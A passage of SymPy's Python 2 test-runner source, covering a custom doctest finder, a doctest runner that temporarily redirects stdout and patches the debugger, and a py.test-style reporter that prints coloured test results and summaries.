classmethods, and properties. Modified from doctest's version by looking harder for code in the case that it looks like the the code comes from a different module. In the case of decorated functions (e.g. 
@vectorize) they appear to come from a different module (e.g. multidemensional) even though their code is not there. """ def _find(self, tests, obj, name, module, source_lines, globs, seen): """ Find tests for the given object and any contained objects, and add them to `tests`. """ if self._verbose: print 'Finding tests in %s' % name # If we've already processed this object, then ignore it. if id(obj) in seen: return seen[id(obj)] = 1 # Make sure we don't run doctests for classes outside of sympy, such # as in numpy or scipy. if inspect.isclass(obj): if obj.__module__.split('.')[0] != 'sympy': return # Find a test for this object, and add it to the list of tests. test = self._get_test(obj, name, module, globs, source_lines) if test is not None: tests.append(test) # Look for tests in a module's contained objects. if inspect.ismodule(obj) and self._recurse: for rawname, val in obj.__dict__.items(): # Recurse to functions & classes. if inspect.isfunction(val) or inspect.isclass(val): in_module = self._from_module(module, val) if not in_module: # double check in case this function is decorated # and just appears to come from a different module. pat = r'\s*(def|class)\s+%s\s*\(' % rawname PAT = pre.compile(pat) in_module = any(PAT.match(line) for line in source_lines) if in_module: try: valname = '%s.%s' % (name, rawname) self._find(tests, val, valname, module, source_lines, globs, seen) except ValueError, msg: raise except: pass # Look for tests in a module's __test__ dictionary. if inspect.ismodule(obj) and self._recurse: for valname, val in getattr(obj, '__test__', {}).items(): if not isinstance(valname, basestring): raise ValueError("SymPyDocTestFinder.find: __test__ keys " "must be strings: %r" % (type(valname),)) if not (inspect.isfunction(val) or inspect.isclass(val) or inspect.ismethod(val) or inspect.ismodule(val) or isinstance(val, basestring)): raise ValueError("SymPyDocTestFinder.find: __test__ values " "must be strings, functions, methods, " "classes, or modules: %r" % (type(val),)) valname = '%s.__test__.%s' % (name, valname) self._find(tests, val, valname, module, source_lines, globs, seen) # Look for tests in a class's contained objects. if inspect.isclass(obj) and self._recurse: for valname, val in obj.__dict__.items(): # Special handling for staticmethod/classmethod. if isinstance(val, staticmethod): val = getattr(obj, valname) if isinstance(val, classmethod): val = getattr(obj, valname).im_func # Recurse to methods, properties, and nested classes. if (inspect.isfunction(val) or inspect.isclass(val) or isinstance(val, property)): in_module = self._from_module(module, val) if not in_module: # "double check" again pat = r'\s*(def|class)\s+%s\s*\(' % valname PAT = pre.compile(pat) in_module = any(PAT.match(line) for line in source_lines) if in_module: valname = '%s.%s' % (name, valname) self._find(tests, val, valname, module, source_lines, globs, seen) def _get_test(self, obj, name, module, globs, source_lines): """ Return a DocTest for the given object, if it defines a docstring; otherwise, return None. """ # Extract the object's docstring. If it doesn't have one, # then return None (no test for this object). if isinstance(obj, basestring): docstring = obj else: try: if obj.__doc__ is None: docstring = '' else: docstring = obj.__doc__ if not isinstance(docstring, basestring): docstring = str(docstring) except (TypeError, AttributeError): docstring = '' # Find the docstring's location in the file. 
lineno = self._find_lineno(obj, source_lines) if lineno is None: # if None, then _find_lineno couldn't find the docstring. # But IT IS STILL THERE. Likely it was decorated or something # (i.e., @property docstrings have lineno == None) # TODO: Write our own _find_lineno that is smarter in this regard # Until then, just give it a dummy lineno. This is just used for # sorting the tests, so the only bad effect is that they will appear # last instead of the order that they really are in the file. # lineno is also used to report the offending line of a failing # doctest, which is another reason to fix this. See issue 1947. lineno = 0 # Don't bother if the docstring is empty. if self._exclude_empty and not docstring: return None # Return a DocTest for this object. if module is None: filename = None else: filename = getattr(module, '__file__', module.__name__) if filename[-4:] in (".pyc", ".pyo"): filename = filename[:-1] return self._parser.get_doctest(docstring, globs, name, filename, lineno) class SymPyDocTestRunner(DocTestRunner): """ A class used to run DocTest test cases, and accumulate statistics. The `run` method is used to process a single DocTest case. It returns a tuple `(f, t)`, where `t` is the number of test cases tried, and `f` is the number of test cases that failed. Modified from the doctest version to not reset the sys.displayhook (see issue 2041). See the docstring of the original DocTestRunner for more information. """ def run(self, test, compileflags=None, out=None, clear_globs=True): """ Run the examples in `test`, and display the results using the writer function `out`. The examples are run in the namespace `test.globs`. If `clear_globs` is true (the default), then this namespace will be cleared after the test runs, to help with garbage collection. If you would like to examine the namespace after the test completes, then use `clear_globs=False`. `compileflags` gives the set of flags that should be used by the Python compiler when running the examples. If not specified, then it will default to the set of future-import flags that apply to `globs`. The output of each example is checked using `SymPyDocTestRunner.check_output`, and the results are formatted by the `SymPyDocTestRunner.report_*` methods. """ self.test = test if compileflags is None: compileflags = pdoctest._extract_future_flags(test.globs) save_stdout = sys.stdout if out is None: out = save_stdout.write sys.stdout = self._fakeout # Patch pdb.set_trace to restore sys.stdout during interactive # debugging (so it's not still redirected to self._fakeout). # Note that the interactive output will go to *our* # save_stdout, even if that's not the real sys.stdout; this # allows us to write test cases for the set_trace behavior. save_set_trace = pdb.set_trace self.debugger = pdoctest._OutputRedirectingPdb(save_stdout) self.debugger.reset() pdb.set_trace = self.debugger.set_trace # Patch linecache.getlines, so we can see the example's source # when we're inside the debugger. self.save_linecache_getlines = pdoctest.linecache.getlines linecache.getlines = self.__patched_linecache_getlines try: return self.__run(test, compileflags, out) finally: sys.stdout = save_stdout pdb.set_trace = save_set_trace linecache.getlines = self.save_linecache_getlines if clear_globs: test.globs.clear() # We have to override the name mangled methods. 
SymPyDocTestRunner._SymPyDocTestRunner__patched_linecache_getlines = \ DocTestRunner._DocTestRunner__patched_linecache_getlines SymPyDocTestRunner._SymPyDocTestRunner__run = DocTestRunner._DocTestRunner__run SymPyDocTestRunner._SymPyDocTestRunner__record_outcome = \ DocTestRunner._DocTestRunner__record_outcome class Reporter(object): """ Parent class for all reporters. """ pass class PyTestReporter(Reporter): """ Py.test like reporter. Should produce output identical to py.test. """ def __init__(self, verbose=False, tb="short", colors=True): self._verbose = verbose self._tb_style = tb self._colors = colors self._xfailed = 0 self._xpassed = [] self._failed = [] self._failed_doctest = [] self._passed = 0 self._skipped = 0 self._exceptions = [] # this tracks the x-position of the cursor (useful for positioning # things on the screen), without the need for any readline library: self._write_pos = 0 self._line_wrap = False def root_dir(self, dir): self._root_dir = dir def write(self, text, color="", align="left", width=80): """ Prints a text on the screen. It uses sys.stdout.write(), so no readline library is necessary. color ... choose from the colors below, "" means default color align ... left/right, left is a normal print, right is aligned on the right hand side of the screen, filled with " " if necessary width ... the screen width """ color_templates = ( ("Black" , "0;30"), ("Red" , "0;31"), ("Green" , "0;32"), ("Brown" , "0;33"), ("Blue" , "0;34"), ("Purple" , "0;35"), ("Cyan" , "0;36"), ("LightGray" , "0;37"), ("DarkGray" , "1;30"), ("LightRed" , "1;31"), ("LightGreen" , "1;32"), ("Yellow" , "1;33"), ("LightBlue" , "1;34"), ("LightPurple" , "1;35"), ("LightCyan" , "1;36"), ("White" , "1;37"), ) colors = {} for name, value in color_templates: colors[name] = value c_normal = '\033[0m' c_color = '\033[%sm' if align == "right": if self._write_pos+len(text) > width: # we don't fit on the current line, create a new line self.write("\n") self.write(" "*(width-self._write_pos-len(text))) if hasattr(sys.stdout, 'isatty') and not sys.stdout.isatty(): # the stdout is not a terminal, this for example happens if the # output is piped to less, e.g. "bin/test | less". In this case, # the terminal control sequences would be printed verbatim, so # don't use any colors. 
color = "" if sys.platform == "win32": # Windows consoles don't support ANSI escape sequences color = "" if self._line_wrap: if text[0] != "\n": sys.stdout.write("\n") if color == "": sys.stdout.write(text) else: sys.stdout.write("%s%s%s" % (c_color % colors[color], text, c_normal)) sys.stdout.flush() l = text.rfind("\n") if l == -1: self._write_pos += len(text) else: self._write_pos = len(text)-l-1 self._line_wrap = self._write_pos >= width self._write_pos %= width def write_center(self, text, delim="="): width = 80 if text != "": text = " %s " % text idx = (width-len(text)) // 2 t = delim*idx + text + delim*(width-idx-len(text)) self.write(t+"\n") def write_exception(self, e, val, tb): t = traceback.extract_tb(tb) # remove the first item, as that is always runtests.py t = t[1:] t = traceback.format_list(t) self.write("".join(t)) t = traceback.format_exception_only(e, val) self.write("".join(t)) def start(self, seed=None): self.write_center("test process starts") executable = sys.executable v = tuple(sys.version_info) python_version = "%s.%s.%s-%s-%s" % v self.write("executable: %s (%s)\n" % (executable, python_version)) from .misc import ARCH self.write("architecture: %s\n" % ARCH) from sympy.polys.domains import GROUND_TYPES self.write("ground types: %s\n" % GROUND_TYPES) if seed is not None: self.write("random seed: %d\n\n" % seed) self._t_start = clock() def finish(self): self._t_end = clock() self.write("\n") global text, linelen text = "tests finished: %d passed, " % self._passed linelen = len(text) def add_text(mytext): global text, linelen """Break new text if too long.""" if linelen + len(mytext) > 80: text += '\n' linelen = 0 text += mytext linelen += len(mytext) if len(self._failed) > 0: add_text("%d failed, " % len(self._failed)) if len(self._failed_doctest) > 0: add_text("%d failed, " % len(self._failed_doctest)) if self._skipped > 0: add_text("%d skipped, " % self._skipped) if self._xfailed > 0: add_text("%d expected to fail, " % self._xfailed) if len(self._xpassed) > 0: add_text("%d expected to fail but passed, " % len(self._xpassed)) if len(self._exceptions) > 0: add_text("%d exceptions, " % len(self._exceptions)) add_text("in %.2f seconds" % (self._t_end - self._t_start)) if len(self._xpassed) > 0: self.write_center("xpassed tests", "_") for e in self._xpassed: self.write("%s:%s\n" % (e[0], e[1])) self.write("\n") if self._tb_style != "no" and len(self._exceptions) > 0: #self.write_center("These tests raised an exception", "_") for e in self._exceptions: filename, f, (t, val, tb) = e self.write_center("", "_") if f is None: s = "%s" % filename else: s = "%s:%s" % (filename, f.__name__) self.write_center(s, "_") self.write_exception(t, val, tb) self.write("\n") if self._tb_style != "no" and len(self._failed) > 0: #self.write_center("Failed", "_") for e in self._failed: filename, f, (t, val, tb) = e self.write_center("", "_") self.write_center("%s:%s" % (filename, f.__name__), "_") self.write_exception(t, val, tb) self.write("\n") if self._tb_style != "no" and len(self._failed_doctest) > 0: #self.write_center("Failed", "_") for e in self._failed_doctest: filename, msg = e self.write_center("", "_") self.write_center("%s" % filename, "_") self.write(msg) self.write("\n") self.write_center(text) ok = len(self._failed) == 0 and len(self._exceptions) == 0 and \ len(self._failed_doctest) == 0 if not ok: self.write("DO *NOT* COMMIT!\n") return ok def entering_filename(self, filename, n): rel_name = filename[len(self._root_dir)+1:] self._active_file = rel_name 
self._active_file_error = False self.write(rel_name) self.write("[%d] " % n) def leaving_filename(self): if self._colors: self.write(" ") if self._active_file_error: self.write("[FAIL]", "Red", align="right") else: self.write("[OK]", "Green", align="right") self.write("\n") if self._verbose: self.write("\n") def entering_test(self, f): self._active_f = f if self._verbose: self.write("\n"+f.__name__+" ") def test_xfail(self): self._xfailed += 1 self.write("f", "Green") def test_xpass(self, fname): self._xpassed.append((self._active_file, fname)) self.write("X", "Green") def test_fail(self, exc_info): self._failed.append((self._active_file, self._active_f, exc_info)) self.write("F", "Red") self._active_file_error = True def doctest_fail(self, name, error_msg): # the first line contains "******", remove it: error_msg = "\n".join(error_msg.split("\n")[1:]) self._failed_doctest.append((name, error_msg)) self.write("F", "Red") self._active_file_error = True def test_pass(self): self._passed += 1 if self._verbose: self.write("ok", "Green") else: self.write(".", "Green") def test_skip(self, v): self._skipped += 1 self.write("s", "Green") if self._verbose: self.write(" - ", "Green") self.write(v.message, "Green") def test_exception(self, exc_info): self._exceptions.append((self._active_file, self._active_f, exc_info)) self.write("E", "Red") self._active_file_error = True def import_error(self, filename, exc_info): self._exceptions.append((filename, None, exc_info)) rel_name = filename[len(self._root_dir)+1:] self.write(rel_name) self.write("[?] Failed to import", "Red") if self._colors: self.write(" ") self.write("[FAIL]", "Red", align="right") self.write("\n") sympy_dir = get_sympy_dir()
agpl-3.0
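A short sketch of how the runners defined in runtests.py above are invoked, mirroring the examples given in its own test() and doctest() docstrings (SymPy 0.7-era API on Python 2; the paths and keyword values are just the illustrative ones from those docstrings):

import sympy

# Run one unit-test file, restricted to tests whose names contain
# "test_equality", with the short traceback style.
sympy.test("sympy/core/tests/test_basic.py", kw="test_equality", tb="short")

# Run the doctests for everything under sympy/functions with verbose reporting.
sympy.doctest("/functions", verbose=True)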